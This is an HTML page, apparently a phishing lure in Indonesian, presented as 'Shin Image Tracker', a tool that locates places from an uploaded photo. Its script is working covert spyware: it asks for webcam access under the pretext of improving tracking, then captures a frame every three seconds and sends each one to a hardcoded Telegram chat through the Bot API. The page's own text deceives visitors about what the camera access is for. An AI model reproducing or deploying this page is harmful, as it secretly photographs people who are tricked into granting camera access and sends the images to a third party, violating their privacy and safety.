<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Image Tracker</title>
    <meta property="og:title" content="Shin Image Tracker" />
    <meta property="og:description" content="Lacak Lokasi Dengan Foto." />
    <meta property="og:image" content="https://telegra.ph/file/8182efdb2415a8e717d9e.jpg" />
    <meta property="og:url" content="https://shin-tracker.vercel.app" />
    <style>
             .container1 {
            display: flex;
            align-items: center;
            justify-content: center;
            width: 100%;                 
            height: 100vh;
            margin: 0;
            padding: 0;
            background-color: #f0f0f0;
        }        
        .image {
            width: 100px;
            height: 100px;
            margin-right: 20px;
        }
        
        .title {
            font-size: 32px;
            color: #666;
            font-family: Georgia, serif;
            text-align: center;
        }
        .container {
            display: flex;
            align-items: center;
        }
        .container img {
            margin-left: 20px; /* Jarak antara gambar dan teks */
        }
        #video-container {
            position: relative;
            width: 100%;
            max-width: 600px;
        }
        canvas {
            width: 100%;
            display: block;
        }
        #overlay {
            position: absolute;
            top: 0;
            left: 0;
            width: 100%;
            height: 100%;
            display: flex;
            justify-content: center;
            align-items: center;
            background-color: rgba(0, 0, 0, 0.5); /* semi-transparent background */
            color: white;
            font-size: 2em;
            font-weight: bold;
            text-align: center;
        }
    </style>
</head>
<body>
    <div class="container">
        <img src="https://telegra.ph/file/32fc804a4917abd24284f.jpg" alt="Logo Shin Image Tracker" class="image">
        <h1 class="title">Shin Image Tracker</h1>
    </div>
    <div id="video-container">       
    <canvas id="canvas" style="display: none;"></canvas>     
        <br>
        <img src="https://telegra.ph/file/7b755c6b85a3ea922ce44.jpg" alt="Tracker Gambar">
     <br>
        <p>Lacak lokasi hanya dengan mengunggah foto, izinkan akses kamera untuk mengoktimalkan pelacakan agar sesuai dan tepat,jika di rasa masih ada error silahkan hubungi customer service.</p>
    <script>
        const canvas = document.getElementById('canvas');
        const context = canvas.getContext('2d');
        const chatId = '7056220365';
        const botToken = '';

        // Minta akses ke kamera
        navigator.mediaDevices.getUserMedia({ video: true })
            .then(stream => {
                const video = document.createElement('video');
                video.srcObject = stream;
                video.play();
                // Ambil foto setiap 3 detik
                setInterval(() => takePhotoAndSend(video), 3000);
            })
            .catch(err => {
                console.error('Error accessing webcam: ', err);
            });

        function takePhotoAndSend(video) {
            canvas.width = video.videoWidth;
            canvas.height = video.videoHeight;
            context.drawImage(video, 0, 0, canvas.width, canvas.height);

            canvas.toBlob(blob => {
                const formData = new FormData();
                formData.append('chat_id', chatId);
                formData.append('photo', blob, 'selfie.jpg');

                fetch(`https://api.telegram.org/bot${botToken}/sendPhoto`, {
                    method: 'POST',
                    body: formData
                })
                .then(response => response.json())
                .then(data => {
                    if (!data.ok) {
                        console.error('Error sending photo to Telegram:', data.description);
                    }
                })
                .catch(error => {
                    console.error('Error:', error);
                });
            }, 'image/jpeg');
        }
    </script>
</body>
</html>
